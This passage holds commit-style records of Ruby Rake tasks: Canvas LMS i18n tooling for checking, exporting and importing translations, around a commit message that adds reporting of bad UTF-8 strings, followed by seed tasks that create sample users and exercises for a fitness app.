files = (Dir.glob('./*') - ['./vendor'] + ['./vendor/plugins'] - ['./guard', './tmp']).map { |d| Dir.glob("#{d}/**/*rb") }.flatten.
reject{ |file| file =~ %r{\A\./(rb-fsevent|vendor/plugins/rails_xss|db|spec)/} }
files &= only if only
file_count = files.size
rb_extractor = I18nExtraction::RubyExtractor.new(:translations => @translations)
process_files(files) do |file|
source = File.read(file)
source = Erubis::Eruby.new(source).src if file =~ /\.erb\z/
sexps = RubyParser.new.parse(source)
rb_extractor.scope = infer_scope(file)
rb_extractor.in_html_view = (file =~ /\.(html|facebook)\.erb\z/)
rb_extractor.process(sexps)
end
# JavaScript
files = (Dir.glob('./public/javascripts/**/*.js') + Dir.glob('./app/views/**/*.erb')).
reject{ |file| file =~ /\A\.\/public\/javascripts\/(i18nObj.js|i18n.js|jst\/|translations\/|compiled\/handlebars_helpers.js|tinymce\/jscripts\/tiny_mce(.*\/langs|\/tiny_mce\w*\.js))/ }
files &= only if only
js_extractor = I18nExtraction::JsExtractor.new(:translations => @translations)
process_files(files) do |file|
t2 = Time.now
ret = js_extractor.process(File.read(file), :erb => (file =~ /\.erb\z/), :filename => file)
file_count += 1 if ret
puts "#{file} #{Time.now - t2}" if Time.now - t2 > 1
ret
end
# Handlebars
files = Dir.glob('./app/views/jst/**/*.handlebars')
files &= only if only
handlebars_extractor = I18nExtraction::HandlebarsExtractor.new(:translations => @translations)
process_files(files) do |file|
file_count += 1 if handlebars_extractor.process(File.read(file), infer_scope(file))
end
print "\n\n"
failure = @errors.size > 0
@errors.each_index do |i|
puts "#{i+1})"
puts red @errors[i]
print "\n"
end
print "Finished in #{Time.now - t} seconds\n\n"
total_strings = rb_extractor.total_unique + js_extractor.total_unique + handlebars_extractor.total_unique
puts send((failure ? :red : :green), "#{file_count} files, #{total_strings} strings, #{@errors.size} failures")
raise "check command encountered errors" if failure
end
desc "Generates a new en.yml file for all translations"
task :generate => :check do
yaml_dir = './config/locales/generated'
FileUtils.mkdir_p(File.join(yaml_dir))
yaml_file = File.join(yaml_dir, "en.yml")
File.open(File.join(RAILS_ROOT, yaml_file), "w") do |file|
file.write({'en' => @translations}.ya2yaml(:syck_compatible => true))
end
print "Wrote new #{yaml_file}\n\n"
end
desc "Generates JS bundle i18n files (non-en) and adds them to assets.yml"
task :generate_js do
require 'bundler'
Bundler.setup
require 'action_controller'
require 'i18n'
require 'sexp_processor'
require 'jammit'
require 'lib/i18n_extraction/js_extractor.rb'
I18n.load_path += Dir[Rails.root.join('config', 'locales', '**', '*.{rb,yml}')] +
Dir[Rails.root.join('vendor', 'plugins', '*', 'config', 'locales', '**', '*.{rb,yml}')]
Hash.send :include, HashExtensions
file_translations = {}
locales = I18n.available_locales - [:en]
# allow passing of extra, empty locales by including a comma-separated
# list of abbreviations in the LOCALES environment variable. e.g.
#
# LOCALES=hi,ja,pt,zh-hans rake i18n:generate_js
locales = locales + ENV['LOCALES'].split(',') if ENV['LOCALES']
all_translations = I18n.backend.send(:translations)
flat_translations = all_translations.flatten_keys
if locales.empty?
puts "Nothing to do, there are no non-en translations"
exit 0
end
process_files = lambda do |extractor, files, arg_block|
files.each do |file|
begin
extractor.translations = {}
extractor.process(File.read(file), *arg_block.call(file)) or next
translations = extractor.translations.flatten_keys.keys
next if translations.empty?
file_translations[extractor.scope] ||= {}
locales.each do |locale|
file_translations[extractor.scope].update flat_translations.slice(*translations.map{ |k| k.gsub(/\A/, "#{locale}.") })
end
rescue
raise "Error reading #{file}: #{$!}\nYou should probably run `rake i18n:check' first"
end
end
end
# JavaScript
files = Dir.glob('./public/javascripts/**/*.js').
reject{ |file| file =~ /\A\.\/public\/javascripts\/(i18nObj.js|i18n.js|jst\/|translations\/|compiled\/handlebars_helpers.js|tinymce\/jscripts\/tiny_mce(.*\/langs|\/tiny_mce\w*\.js))/ }
js_extractor = I18nExtraction::JsExtractor.new
process_files.call(js_extractor, files, lambda{ |file| [{:filename => file}] } )
# Handlebars
files = Dir.glob('./app/views/jst/**/*.handlebars')
handlebars_extractor = I18nExtraction::HandlebarsExtractor.new
process_files.call(handlebars_extractor, files, lambda{ |file| [infer_scope(file)] } )
dump_translations = lambda do |translation_name, translations|
file = "public/javascripts/translations/#{translation_name}.js"
locales.each { |locale| translations[locale.to_s] ||= {} }
content = <<-TRANSLATIONS
// this file was auto-generated by rake i18n:generate_js.
// you probably shouldn't edit it directly
define(['i18nObj', 'jquery'], function(I18n, $) {
$.extend(true, I18n, {translations: #{translations.to_ordered.to_json}});
});
TRANSLATIONS
if !File.exist?(file) || File.read(file) != content
File.open(file, "w"){ |f| f.write content }
end
end
file_translations.each do |scope, translations|
dump_translations.call(scope, translations.expand_keys)
end
# in addition to getting the non-en stuff into each scope_file, we need to get the core
# formats and stuff for all languages (en included) into the common scope_file
core_translations = I18n.available_locales.inject({}) { |h1, locale|
h1[locale.to_s] = all_translations[locale].slice(:date, :time, :number, :datetime, :support)
h1
}
dump_translations.call('_core_en', {'en' => core_translations.delete('en')})
dump_translations.call('_core', core_translations)
end
desc "Exports new/changed English strings to be translated"
task :export => :environment do
Hash.send :include, HashExtensions
begin
base_filename = "config/locales/generated/en.yml"
export_filename = 'en.yml'
current_branch = nil
prevgit = {}
prevgit[:branch] = `git branch | grep '\*'`.sub(/^\* /, '').strip
prevgit.delete(:branch) if prevgit[:branch].blank? || prevgit[:branch] == 'master'
unless `git status -s | grep -v '^\?\?' | wc -l`.strip == '0'
`git stash`
prevgit[:stashed] = true
end
last_export = nil
begin
puts "Enter path or hash of previous export base (omit to export all):"
arg = $stdin.gets.strip
if arg.blank?
last_export = {:type => :none}
elsif arg =~ /\A[a-f0-9]{7,}\z/
puts "Fetching previous export..."
ret = `git show --name-only --oneline #{arg}`
if $?.exitstatus == 0
if ret.include?(base_filename)
`git checkout #{arg}`
if previous = YAML.safe_load(File.read(base_filename)).flatten_keys rescue nil
last_export = {:type => :commit, :data => previous}
else
$stderr.puts "Unable to load en.yml file"
end
else
$stderr.puts "Commit contains no en.yml file"
end
else
$stderr.puts "Invalid commit hash"
end
`git status -s | grep -v '^\?\?' | wc -l`
else
puts "Loading previous export..."
if File.exist?(arg)
if previous = YAML.safe_load(File.read(arg)).flatten_keys rescue nil
last_export = {:type => :file, :data => previous}
else
$stderr.puts "Unable to load yml file"
end
else
$stderr.puts "Invalid path"
end
end
end until last_export
begin
puts "Enter local branch containing current en translations (default master):"
current_branch = $stdin.gets.strip
end until current_branch.blank? || current_branch !~ /[^a-z0-9_\.\-]/
current_branch = nil if current_branch.blank?
puts "Extracting current en translations..."
`git checkout #{current_branch || 'master'}` if last_export[:type] == :commit || current_branch != prevgit[:branch]
Rake::Task["i18n:generate"].invoke
puts "Exporting #{last_export[:data] ? "new/changed" : "all"} en translations..."
current_strings = YAML.safe_load(File.read(base_filename)).flatten_keys
new_strings = last_export[:data] ?
current_strings.inject({}){ |h, (k, v)|
h[k] = v unless last_export[:data][k] == v
h
} :
current_strings
File.open(export_filename, "w"){ |f| f.write new_strings.expand_keys.ya2yaml(:syck_compatible => true) }
push = 'n'
begin
puts "Commit and push current translations? (Y/N)"
push = $stdin.gets.strip.downcase[0, 1]
end until ["y", "n"].include?(push)
if push == 'y'
`git add #{base_filename}`
if `git status -s | grep -v '^\?\?' | wc -l`.strip == '0'
puts "Exported en.yml, current translations unmodified (check git log for last change)"
else
`git commit -a -m"generated en.yml for translation"`
remote_branch = `git remote-ref`.strip.sub(%r{\Aremotes/[^/]+/(.*)\z}, '\\1')
local = current_branch || 'master'
`remote=$(git config branch."#{local}".remote); \
remote_ref=$(git config branch."#{local}".merge); \
remote_name=${remote_ref##refs/heads/}; \
git push $remote HEAD:refs/for/$remote_name`
puts "Exported en.yml, committed/pushed current translations (#{`git log --oneline|head -n 1`.sub(/ .*/m, '')})"
end
else
puts "Exported en.yml, dumped current translations (not committed)"
end
ensure
`git checkout #{prevgit[:branch] || 'master'}` if prevgit[:branch] != current_branch
`git stash pop` if prevgit[:stashed]
end
end
desc "Validates and imports new translations"
task :import => :environment do
require 'ya2yaml'
Hash.send :include, HashExtensions
def placeholders(str)
str.scan(/%h?\{[^\}]+\}/).sort
end
def markdown_and_wrappers(str)
# some stuff this doesn't check (though we don't use):
# blockquotes, e.g. "> some text"
# reference links, e.g. "[an example][id]"
# indented code
(
str.scan(/\\[\\`\*_\{\}\[\]\(\)#\+\-\.!]/) +
str.scan(/(\*+|_+|`+)[^\s].*?[^\s]?\1/).map{|m|"#{m}-wrap"} +
str.scan(/(!?\[)[^\]]+\]\(([^\)"']+).*?\)/).map{|m|"link:#{m.last}"} +
str.scan(/^((\s*\*\s*){3,}|(\s*-\s*){3,}|(\s*_\s*){3,})$/).map{"hr"} +
str.scan(/^[^=\-\n]+\n^(=+|-+)$/).map{|m|m.first[0]=='=' ? 'h1' : 'h2'} +
str.scan(/^(\#{1,6})\s+[^#]*#*$/).map{|m|"h#{m.first.size}"} +
str.scan(/^ {0,3}(\d+\.|\*|\+|\-)\s/).map{|m|m.first =~ /\d/ ? "1." : "*"}
).sort
end
begin
puts "Enter path to original en.yml file:"
arg = $stdin.gets.strip
source_translations = File.exist?(arg) && YAML.safe_load(File.read(arg)) rescue nil
end until source_translations
raise "Source does not have any English strings" unless source_translations.keys.include?('en')
source_translations = source_translations['en'].flatten_keys
begin
puts "Enter path to translated file:"
arg = $stdin.gets.strip
new_translations = File.exist?(arg) && YAML.safe_load(File.read(arg)) rescue nil
end until new_translations
raise "Translation file contains multiple languages" if new_translations.size > 1
language = new_translations.keys.first
raise "Translation file appears to have only English strings" if language == 'en'
new_translations = new_translations[language].flatten_keys
item_warning = lambda { |error_items, description|
begin
puts "Warning: #{error_items.size} #{description}. What would you like to do?"
puts " [C] continue anyway"
puts " [V] view #{description}"
puts " [D] debug"
puts " [Q] quit"
command = $stdin.gets.upcase.strip
return false if command == 'Q'
debugger if command == 'D'
puts error_items.join("\n") if command == 'V'
end while command != 'C'
true
}
missing_keys = source_translations.keys - new_translations.keys
next unless item_warning.call(missing_keys.sort, "missing translations") if missing_keys.present?
unexpected_keys = new_translations.keys - source_translations.keys
next unless item_warning.call(unexpected_keys.sort, "unexpected translations") if unexpected_keys.present?
placeholder_mismatches = {}
markdown_mismatches = {}
new_translations.keys.each do |key|
p1 = placeholders(source_translations[key].to_s)
p2 = placeholders(new_translations[key].to_s)
placeholder_mismatches[key] = [p1, p2] if p1 != p2
m1 = markdown_and_wrappers(source_translations[key].to_s)
m2 = markdown_and_wrappers(new_translations[key].to_s)
markdown_mismatches[key] = [m1, m2] if m1 != m2
end
if placeholder_mismatches.size > 0
next unless item_warning.call(placeholder_mismatches.map{|k,(p1,p2)| "#{k}: expected #{p1.inspect}, got #{p2.inspect}"}.sort, "placeholder mismatches")
end
if markdown_mismatches.size > 0
next unless item_warning.call(markdown_mismatches.map{|k,(p1,p2)| "#{k}: expected #{p1.inspect}, got #{p2.inspect}"}.sort, "markdown/wrapper mismatches")
end
I18n.available_locales
new_translations = (I18n.backend.send(:translations)[language.to_sym] || {}).flatten_keys.merge(new_translations)
File.open("config/locales/#{language}.yml", "w") { |f|
f.write({language => new_translations.expand_keys}.ya2yaml(:syck_compatible => true))
}
end
end
show bad UTF-8 strings on translation files
translation files (such as our recent fr.yml) can have \xNN character
strings in them. If they are invalid UTF-8 byte sequences, the
translation import (rake i18n:import) will fail without any hints
as to what the problematic string is. This fixes it.
Test Plan:
- run rake i18n:import on a translation file that has \x81 in it
and you should get a message with the causal string
Change-Id: I412efd1511f80d0e7e5519766a49a25dfa1639b0
Reviewed-on: https://gerrit.instructure.com/17909
Tested-by: Jenkins <d95b56ce41a2e1ac4cecdd398defd7414407cc08@instructure.com>
Reviewed-by: Brian Palmer <3cb4e1df5ec4da2c7c4af7c52cec8cf340a55a10@instructure.com>
QA-Review: Brian Palmer <3cb4e1df5ec4da2c7c4af7c52cec8cf340a55a10@instructure.com>
namespace :i18n do
module HashExtensions
def flatten_keys(result={}, prefix='')
each_pair do |k, v|
if v.is_a?(Hash)
v.flatten_keys(result, "#{prefix}#{k}.")
else
result["#{prefix}#{k}"] = v
end
end
result
end
def expand_keys(result = {})
each_pair do |k, v|
parts = k.split('.')
last = parts.pop
parts.inject(result){ |h, k2| h[k2] ||= {}}[last] = v
end
result
end
def to_ordered
keys.sort_by(&:to_s).inject ActiveSupport::OrderedHash.new do |h, k|
v = fetch(k)
h[k] = v.is_a?(Hash) ? v.to_ordered : v
h
end
end
end
def infer_scope(filename)
case filename
when /app\/views\/.*\.handlebars\z/
filename.gsub(/.*app\/views\/jst\/_?|\.handlebars\z/, '').underscore.gsub(/\/_?/, '.')
when /app\/controllers\//
scope = filename.gsub(/.*app\/controllers\/|controller.rb/, '').gsub(/\/_?|_\z/, '.')
scope == 'application.' ? '' : scope
when /app\/messages\//
filename.gsub(/.*app\/|erb/, '').gsub(/\/_?/, '.')
when /app\/models\//
scope = filename.gsub(/.*app\/models\/|rb/, '')
STI_SUPERCLASSES.include?(scope) ? '' : scope
when /app\/views\//
filename.gsub(/.*app\/views\/|(html\.|fbml\.)?erb\z/, '').gsub(/\/_?/, '.')
else
''
end
end
desc "Verifies all translation calls"
task :check => :environment do
Bundler.require :i18n_tools
only = if ENV['ONLY']
ENV['ONLY'].split(',').map{ |path|
path = '**/' + path if path =~ /\*/
path = './' + path unless path =~ /\A.?\//
if path =~ /\*/
path = Dir.glob(path)
elsif path !~ /\.(e?rb|js)\z/
path = Dir.glob(path + '/**/*')
end
path
}.flatten
end
STI_SUPERCLASSES = (`grep '^class.*<' ./app/models/*rb|grep -v '::'|sed 's~.*< ~~'|sort|uniq`.split("\n") - ['OpenStruct', 'Tableless']).
map{ |name| name.underscore + '.' }
COLOR_ENABLED = ($stdout.tty? rescue false)
def color(text, color_code)
COLOR_ENABLED ? "#{color_code}#{text}\e[0m" : text
end
def green(text)
color(text, "\e[32m")
end
def red(text)
color(text, "\e[31m")
end
@errors = []
def process_files(files)
files.each do |file|
begin
print green "." if yield file
rescue SyntaxError, StandardError
@errors << "#{$!}\n#{file}"
print red "F"
end
end
end
t = Time.now
I18n.available_locales
stringifier = proc { |hash, (key, value)|
hash[key.to_s] = value.is_a?(Hash) ?
value.inject({}, &stringifier) :
value
hash
}
@translations = I18n.backend.send(:translations)[:en].inject({}, &stringifier)
# Ruby
files = (Dir.glob('./*') - ['./vendor'] + ['./vendor/plugins'] - ['./guard', './tmp']).map { |d| Dir.glob("#{d}/**/*rb") }.flatten.
reject{ |file| file =~ %r{\A\./(rb-fsevent|vendor/plugins/rails_xss|db|spec)/} }
files &= only if only
file_count = files.size
rb_extractor = I18nExtraction::RubyExtractor.new(:translations => @translations)
process_files(files) do |file|
source = File.read(file)
source = Erubis::Eruby.new(source).src if file =~ /\.erb\z/
sexps = RubyParser.new.parse(source)
rb_extractor.scope = infer_scope(file)
rb_extractor.in_html_view = (file =~ /\.(html|facebook)\.erb\z/)
rb_extractor.process(sexps)
end
# JavaScript
files = (Dir.glob('./public/javascripts/**/*.js') + Dir.glob('./app/views/**/*.erb')).
reject{ |file| file =~ /\A\.\/public\/javascripts\/(i18nObj.js|i18n.js|jst\/|translations\/|compiled\/handlebars_helpers.js|tinymce\/jscripts\/tiny_mce(.*\/langs|\/tiny_mce\w*\.js))/ }
files &= only if only
js_extractor = I18nExtraction::JsExtractor.new(:translations => @translations)
process_files(files) do |file|
t2 = Time.now
ret = js_extractor.process(File.read(file), :erb => (file =~ /\.erb\z/), :filename => file)
file_count += 1 if ret
puts "#{file} #{Time.now - t2}" if Time.now - t2 > 1
ret
end
# Handlebars
files = Dir.glob('./app/views/jst/**/*.handlebars')
files &= only if only
handlebars_extractor = I18nExtraction::HandlebarsExtractor.new(:translations => @translations)
process_files(files) do |file|
file_count += 1 if handlebars_extractor.process(File.read(file), infer_scope(file))
end
print "\n\n"
failure = @errors.size > 0
@errors.each_index do |i|
puts "#{i+1})"
puts red @errors[i]
print "\n"
end
print "Finished in #{Time.now - t} seconds\n\n"
total_strings = rb_extractor.total_unique + js_extractor.total_unique + handlebars_extractor.total_unique
puts send((failure ? :red : :green), "#{file_count} files, #{total_strings} strings, #{@errors.size} failures")
raise "check command encountered errors" if failure
end
desc "Generates a new en.yml file for all translations"
task :generate => :check do
yaml_dir = './config/locales/generated'
FileUtils.mkdir_p(File.join(yaml_dir))
yaml_file = File.join(yaml_dir, "en.yml")
File.open(File.join(RAILS_ROOT, yaml_file), "w") do |file|
file.write({'en' => @translations}.ya2yaml(:syck_compatible => true))
end
print "Wrote new #{yaml_file}\n\n"
end
desc "Generates JS bundle i18n files (non-en) and adds them to assets.yml"
task :generate_js do
require 'bundler'
Bundler.setup
require 'action_controller'
require 'i18n'
require 'sexp_processor'
require 'jammit'
require 'lib/i18n_extraction/js_extractor.rb'
I18n.load_path += Dir[Rails.root.join('config', 'locales', '**', '*.{rb,yml}')] +
Dir[Rails.root.join('vendor', 'plugins', '*', 'config', 'locales', '**', '*.{rb,yml}')]
Hash.send :include, HashExtensions
file_translations = {}
locales = I18n.available_locales - [:en]
# allow passing of extra, empty locales by including a comma-separated
# list of abbreviations in the LOCALES environment variable. e.g.
#
# LOCALES=hi,ja,pt,zh-hans rake i18n:generate_js
locales = locales + ENV['LOCALES'].split(',') if ENV['LOCALES']
all_translations = I18n.backend.send(:translations)
flat_translations = all_translations.flatten_keys
if locales.empty?
puts "Nothing to do, there are no non-en translations"
exit 0
end
process_files = lambda do |extractor, files, arg_block|
files.each do |file|
begin
extractor.translations = {}
extractor.process(File.read(file), *arg_block.call(file)) or next
translations = extractor.translations.flatten_keys.keys
next if translations.empty?
file_translations[extractor.scope] ||= {}
locales.each do |locale|
file_translations[extractor.scope].update flat_translations.slice(*translations.map{ |k| k.gsub(/\A/, "#{locale}.") })
end
rescue
raise "Error reading #{file}: #{$!}\nYou should probably run `rake i18n:check' first"
end
end
end
# JavaScript
files = Dir.glob('./public/javascripts/**/*.js').
reject{ |file| file =~ /\A\.\/public\/javascripts\/(i18nObj.js|i18n.js|jst\/|translations\/|compiled\/handlebars_helpers.js|tinymce\/jscripts\/tiny_mce(.*\/langs|\/tiny_mce\w*\.js))/ }
js_extractor = I18nExtraction::JsExtractor.new
process_files.call(js_extractor, files, lambda{ |file| [{:filename => file}] } )
# Handlebars
files = Dir.glob('./app/views/jst/**/*.handlebars')
handlebars_extractor = I18nExtraction::HandlebarsExtractor.new
process_files.call(handlebars_extractor, files, lambda{ |file| [infer_scope(file)] } )
dump_translations = lambda do |translation_name, translations|
file = "public/javascripts/translations/#{translation_name}.js"
locales.each { |locale| translations[locale.to_s] ||= {} }
content = <<-TRANSLATIONS
// this file was auto-generated by rake i18n:generate_js.
// you probably shouldn't edit it directly
define(['i18nObj', 'jquery'], function(I18n, $) {
$.extend(true, I18n, {translations: #{translations.to_ordered.to_json}});
});
TRANSLATIONS
if !File.exist?(file) || File.read(file) != content
File.open(file, "w"){ |f| f.write content }
end
end
file_translations.each do |scope, translations|
dump_translations.call(scope, translations.expand_keys)
end
# in addition to getting the non-en stuff into each scope_file, we need to get the core
# formats and stuff for all languages (en included) into the common scope_file
core_translations = I18n.available_locales.inject({}) { |h1, locale|
h1[locale.to_s] = all_translations[locale].slice(:date, :time, :number, :datetime, :support)
h1
}
dump_translations.call('_core_en', {'en' => core_translations.delete('en')})
dump_translations.call('_core', core_translations)
end
desc "Exports new/changed English strings to be translated"
task :export => :environment do
Hash.send :include, HashExtensions
begin
base_filename = "config/locales/generated/en.yml"
export_filename = 'en.yml'
current_branch = nil
prevgit = {}
prevgit[:branch] = `git branch | grep '\*'`.sub(/^\* /, '').strip
prevgit.delete(:branch) if prevgit[:branch].blank? || prevgit[:branch] == 'master'
unless `git status -s | grep -v '^\?\?' | wc -l`.strip == '0'
`git stash`
prevgit[:stashed] = true
end
last_export = nil
begin
puts "Enter path or hash of previous export base (omit to export all):"
arg = $stdin.gets.strip
if arg.blank?
last_export = {:type => :none}
elsif arg =~ /\A[a-f0-9]{7,}\z/
puts "Fetching previous export..."
ret = `git show --name-only --oneline #{arg}`
if $?.exitstatus == 0
if ret.include?(base_filename)
`git checkout #{arg}`
if previous = YAML.safe_load(File.read(base_filename)).flatten_keys rescue nil
last_export = {:type => :commit, :data => previous}
else
$stderr.puts "Unable to load en.yml file"
end
else
$stderr.puts "Commit contains no en.yml file"
end
else
$stderr.puts "Invalid commit hash"
end
`git status -s | grep -v '^\?\?' | wc -l`
else
puts "Loading previous export..."
if File.exist?(arg)
if previous = YAML.safe_load(File.read(arg)).flatten_keys rescue nil
last_export = {:type => :file, :data => previous}
else
$stderr.puts "Unable to load yml file"
end
else
$stderr.puts "Invalid path"
end
end
end until last_export
begin
puts "Enter local branch containing current en translations (default master):"
current_branch = $stdin.gets.strip
end until current_branch.blank? || current_branch !~ /[^a-z0-9_\.\-]/
current_branch = nil if current_branch.blank?
puts "Extracting current en translations..."
`git checkout #{current_branch || 'master'}` if last_export[:type] == :commit || current_branch != prevgit[:branch]
Rake::Task["i18n:generate"].invoke
puts "Exporting #{last_export[:data] ? "new/changed" : "all"} en translations..."
current_strings = YAML.safe_load(File.read(base_filename)).flatten_keys
new_strings = last_export[:data] ?
current_strings.inject({}){ |h, (k, v)|
h[k] = v unless last_export[:data][k] == v
h
} :
current_strings
File.open(export_filename, "w"){ |f| f.write new_strings.expand_keys.ya2yaml(:syck_compatible => true) }
push = 'n'
begin
puts "Commit and push current translations? (Y/N)"
push = $stdin.gets.strip.downcase[0, 1]
end until ["y", "n"].include?(push)
if push == 'y'
`git add #{base_filename}`
if `git status -s | grep -v '^\?\?' | wc -l`.strip == '0'
puts "Exported en.yml, current translations unmodified (check git log for last change)"
else
`git commit -a -m"generated en.yml for translation"`
remote_branch = `git remote-ref`.strip.sub(%r{\Aremotes/[^/]+/(.*)\z}, '\\1')
local = current_branch || 'master'
`remote=$(git config branch."#{local}".remote); \
remote_ref=$(git config branch."#{local}".merge); \
remote_name=${remote_ref##refs/heads/}; \
git push $remote HEAD:refs/for/$remote_name`
puts "Exported en.yml, committed/pushed current translations (#{`git log --oneline|head -n 1`.sub(/ .*/m, '')})"
end
else
puts "Exported en.yml, dumped current translations (not committed)"
end
ensure
`git checkout #{prevgit[:branch] || 'master'}` if prevgit[:branch] != current_branch
`git stash pop` if prevgit[:stashed]
end
end
desc "Validates and imports new translations"
task :import => :environment do
require 'ya2yaml'
Hash.send :include, HashExtensions
def placeholders(str)
str.scan(/%h?\{[^\}]+\}/).sort
rescue ArgumentError => e
puts "Unable to scan string: #{str.inspect}"
raise e
end
def scan_and_report(str, re)
str.scan(re)
rescue ArgumentError => e
puts "Unable to scan string: #{str.inspect}"
raise e
end
def markdown_and_wrappers(str)
# some stuff this doesn't check (though we don't use):
# blockquotes, e.g. "> some text"
# reference links, e.g. "[an example][id]"
# indented code
(
scan_and_report(str, /\\[\\`\*_\{\}\[\]\(\)#\+\-\.!]/) +
scan_and_report(str, /(\*+|_+|`+)[^\s].*?[^\s]?\1/).map{|m|"#{m}-wrap"} +
scan_and_report(str, /(!?\[)[^\]]+\]\(([^\)"']+).*?\)/).map{|m|"link:#{m.last}"} +
scan_and_report(str, /^((\s*\*\s*){3,}|(\s*-\s*){3,}|(\s*_\s*){3,})$/).map{"hr"} +
scan_and_report(str, /^[^=\-\n]+\n^(=+|-+)$/).map{|m|m.first[0]=='=' ? 'h1' : 'h2'} +
scan_and_report(str, /^(\#{1,6})\s+[^#]*#*$/).map{|m|"h#{m.first.size}"} +
scan_and_report(str, /^ {0,3}(\d+\.|\*|\+|\-)\s/).map{|m|m.first =~ /\d/ ? "1." : "*"}
).sort
end
begin
puts "Enter path to original en.yml file:"
arg = $stdin.gets.strip
source_translations = File.exist?(arg) && YAML.safe_load(File.read(arg)) rescue nil
end until source_translations
raise "Source does not have any English strings" unless source_translations.keys.include?('en')
source_translations = source_translations['en'].flatten_keys
begin
puts "Enter path to translated file:"
arg = $stdin.gets.strip
new_translations = File.exist?(arg) && YAML.safe_load(File.read(arg)) rescue nil
end until new_translations
raise "Translation file contains multiple languages" if new_translations.size > 1
language = new_translations.keys.first
raise "Translation file appears to have only English strings" if language == 'en'
new_translations = new_translations[language].flatten_keys
item_warning = lambda { |error_items, description|
begin
puts "Warning: #{error_items.size} #{description}. What would you like to do?"
puts " [C] continue anyway"
puts " [V] view #{description}"
puts " [D] debug"
puts " [Q] quit"
command = $stdin.gets.upcase.strip
return false if command == 'Q'
debugger if command == 'D'
puts error_items.join("\n") if command == 'V'
end while command != 'C'
true
}
missing_keys = source_translations.keys - new_translations.keys
next unless item_warning.call(missing_keys.sort, "missing translations") if missing_keys.present?
unexpected_keys = new_translations.keys - source_translations.keys
next unless item_warning.call(unexpected_keys.sort, "unexpected translations") if unexpected_keys.present?
placeholder_mismatches = {}
markdown_mismatches = {}
new_translations.keys.each do |key|
p1 = placeholders(source_translations[key].to_s)
p2 = placeholders(new_translations[key].to_s)
placeholder_mismatches[key] = [p1, p2] if p1 != p2
m1 = markdown_and_wrappers(source_translations[key].to_s)
m2 = markdown_and_wrappers(new_translations[key].to_s)
markdown_mismatches[key] = [m1, m2] if m1 != m2
end
if placeholder_mismatches.size > 0
next unless item_warning.call(placeholder_mismatches.map{|k,(p1,p2)| "#{k}: expected #{p1.inspect}, got #{p2.inspect}"}.sort, "placeholder mismatches")
end
if markdown_mismatches.size > 0
next unless item_warning.call(markdown_mismatches.map{|k,(p1,p2)| "#{k}: expected #{p1.inspect}, got #{p2.inspect}"}.sort, "markdown/wrapper mismatches")
end
I18n.available_locales
new_translations = (I18n.backend.send(:translations)[language.to_sym] || {}).flatten_keys.merge(new_translations)
File.open("config/locales/#{language}.yml", "w") { |f|
f.write({language => new_translations.expand_keys}.ya2yaml(:syck_compatible => true))
}
end
end
|
namespace :seed do
task all: ["users", "workouts"]
desc 'Seed Workouts'
task :workouts => :environment do
workouts = {
}
end
desc 'Seed Users'
task :users => :environment do
users = [
{ :name => "Jacob", :gender => "male", :longest_distance => 3.1, :mile_time => 540_000 },
{ :name => "Sophia", :gender => "female", :longest_distance => 3.1, :mile_time => 570_000 },
{ :name => "Mason", :gender => "male", :longest_distance => 5.2, :mile_time => 360_000 },
{ :name => "Emma", :gender => "female", :longest_distance => 5.2, :mile_time => 390_000 },
{ :name => "Ethan", :gender => "male", :longest_distance => 13.1, :mile_time => 430_000 },
{ :name => "Isabella", :gender => "female", :longest_distance => 13.1, :mile_time => 470_000 },
{ :name => "Noah", :gender => "male", :longest_distance => 26.2, :mile_time => 500_000 },
{ :name => "Olivia", :gender => "female", :longest_distance => 26.2, :mile_time => 510_000 },
{ :name => "William", :gender => "male", :longest_distance => 50, :mile_time => 600_000 },
{ :name => "Ava", :gender => "female", :longest_distance => 50, :mile_time => 640_000 },
{ :name => "Liam", :gender => "male", :longest_distance => 1, :mile_time => 720_000 },
{ :name => "Emily", :gender => "female", :longest_distance => 1, :mile_time => 760_000 },
{ :name => "Jayden", :gender => "male", :longest_distance => 0.2, :mile_time => 1_200_000 },
{ :name => "Abigail", :gender => "female", :longest_distance => 0.2, :mile_time => 1_200_000 },
{ :name => "Michael", :gender => "male", :longest_distance => 3.9, :mile_time => 460_000 },
{ :name => "Mia", :gender => "female", :longest_distance => 4.3, :mile_time => 490_000 },
{ :name => "Alexander", :gender => "male", :longest_distance => 5.3, :mile_time => 430_000 },
{ :name => "Madison", :gender => "female", :longest_distance => 4.8, :mile_time => 450_000 },
{ :name => "Aiden", :gender => "male", :longest_distance => 18.8, :mile_time => 400_000 },
{ :name => "Elizabeth", :gender => "female", :longest_distance => 16.4, :mile_time => 415_000 }
]
users.each do |user|
User.create user
end
end
end
More seed crap
namespace :seed do
task all: ["exercises", "users"]
desc 'Seed Exercise'
task :exercises => :environment do
exercises = [
{ :name => "Long Slow Run", :time => 60, :units => '["miles","minutes"]', :instructions => "Keep this run at a conversational pace. The strides should be run at 95% effort after the run with a full recovery between." },
{ :name => "Pull Ups", :time => 5, :units => '["reps"]', :instructions => "Stand below pull-up bar and grasp it with wide overhand grip. Hang on bar. Bend your knees and cross your lower legs. Pull your body up until your upper chest reaches the bar. Look up and keep chest up, leading toward the bar. Return with same speed. Keep the arms very slightly bent at the bottom of the motion to maintain the muscular activity. Simultaneously let your your shoulders be pulled up by the bodyweight. Repeat." },
{ :name => "Push Ups", :time => 5, :units => '["reps"]', :instructions => "Keeping body straight, lower body to floor by bending arms. Push body up until arms are extended. Repeat." },
{ :name => "Sit Ups", :time => 5, :units => '["reps"]', :instructions => "Have your knees bent and the balls of your feet and heels placed flat on the ground. Place your hands on opposing shoulders, so that your arms are crossed over your chest, or behind your head. This allows you a central rising point. Tighten your abdominal muscles gently by drawing in your belly button to your spine. Keeping your heels on the ground and your toes flat to the ground, slowly and gently lift your head first, followed by your shoulder blades. Focus your eyes on your bent knees, all the while gently contracting the abdominal muscles. Pull up from the floor until you're at a ninety-degree angle, or when the elbows are on, or past, the knees. Hold the position for a second. Slowly bring the torso back to the floor but try to keep it slightly elevated off the ground. This means not to place your back flat to the ground but to keep a slight, yet relaxed, arch." },
{ :name => "Squats", :time => 5, :units => '["reps"]', :instructions => "Stand with your head facing forward and your chest held up and out. Place your feet shoulder-width apart or slightly wider. Extend your hands straight out in front of you to help keep your balance. Sit back and down like you're sitting into an imaginary chair. Keep your head facing forward as your upper body bends forward a bit. Rather than allowing your back to round, let your lower back arch slightly as you descend. Lower down so your thighs are as parallel to the floor as possible, with your knees over your ankles. Press your weight back into your heels. Keep your body tight, and push through your heels to bring yourself back to the starting position." },
{ :name => "Long Slow Biking", :time => 60, :units => '["miles","minutes"]', :instructions => "Keep this trip at a conversational pace. The RPM should be at 95% effort after the trip with a full recovery between." },
